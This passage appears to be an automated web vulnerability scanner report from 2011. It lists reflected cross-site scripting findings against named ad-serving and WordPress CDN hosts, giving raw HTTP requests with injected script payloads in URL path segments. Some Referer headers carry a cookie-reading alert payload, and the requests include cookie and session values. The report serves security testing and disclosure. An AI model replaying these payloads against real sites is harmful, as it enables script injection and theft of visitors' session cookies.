Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d062c"><script>alert(1)</script>ca4abf2e429 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominosd062c"><script>alert(1)</script>ca4abf2e429/11Q2/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90454"><script>alert(1)</script>2d82bb5a239 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q290454"><script>alert(1)</script>2d82bb5a239/CPC/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284b4"><script>alert(1)</script>d510252fe66 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4d2"><script>alert(1)</script>1a64d0928f4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764de"><script>alert(1)</script>9f3a5ed7d4b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90764de"><script>alert(1)</script>9f3a5ed7d4b HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c5f0"><script>alert(1)</script>f92225dbdf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff03f"><script>alert(1)</script>e08fcce560c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56e9"><script>alert(1)</script>e3257083564 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 232e4"><script>alert(1)</script>518b442c3c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce9"><script>alert(1)</script>6f09d14ccb6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a008"><script>alert(1)</script>f83aab5e457 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728/1849951236@x901a008"><script>alert(1)</script>f83aab5e457 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 335
Content-Type: text/html
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2828"><script>alert(1)</script>eab5008b54d was submitted in the REST URL parameter 1. This input was echoed as e2828\"><script>alert(1)</script>eab5008b54d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1648a"><script>alert(1)</script>480ef64af3a was submitted in the REST URL parameter 5. This input was echoed as 1648a\"><script>alert(1)</script>480ef64af3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c916"><script>alert(1)</script>97b02068444 was submitted in the REST URL parameter 1. This input was echoed as 1c916\"><script>alert(1)</script>97b02068444 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content1c916"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77cc0"><script>alert(1)</script>a500ca9f17c was submitted in the REST URL parameter 2. This input was echoed as 77cc0\"><script>alert(1)</script>a500ca9f17c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins77cc0"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c461c"><script>alert(1)</script>81ebd71ba86 was submitted in the REST URL parameter 5. This input was echoed as c461c\"><script>alert(1)</script>81ebd71ba86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c"><script>alert(1)</script>81ebd71ba86?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d47c"><script>alert(1)</script>cccc92e06a7 was submitted in the REST URL parameter 1. This input was echoed as 6d47c\"><script>alert(1)</script>cccc92e06a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content6d47c"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1507c"><script>alert(1)</script>38cdb41f31a was submitted in the REST URL parameter 2. This input was echoed as 1507c\"><script>alert(1)</script>38cdb41f31a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins1507c"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64300"><script>alert(1)</script>a237d15471e was submitted in the REST URL parameter 5. This input was echoed as 64300\"><script>alert(1)</script>a237d15471e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/amr-ical-events-list/css/icalprint.css64300"><script>alert(1)</script>a237d15471e?ver=1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2db02"><script>alert(1)</script>561302ac03e was submitted in the REST URL parameter 1. This input was echoed as 2db02\"><script>alert(1)</script>561302ac03e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content2db02"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43df5"><script>alert(1)</script>8ce814d076d was submitted in the REST URL parameter 2. This input was echoed as 43df5\"><script>alert(1)</script>8ce814d076d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins43df5"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd478"><script>alert(1)</script>dd6edca9943 was submitted in the REST URL parameter 5. This input was echoed as bd478\"><script>alert(1)</script>dd6edca9943 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/grunion-contact-form/css/grunion.cssbd478"><script>alert(1)</script>dd6edca9943?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc84"><script>alert(1)</script>24036739709 was submitted in the REST URL parameter 1. This input was echoed as 9cc84\"><script>alert(1)</script>24036739709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content9cc84"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ed3"><script>alert(1)</script>ff23996d7ad was submitted in the REST URL parameter 2. This input was echoed as 21ed3\"><script>alert(1)</script>ff23996d7ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
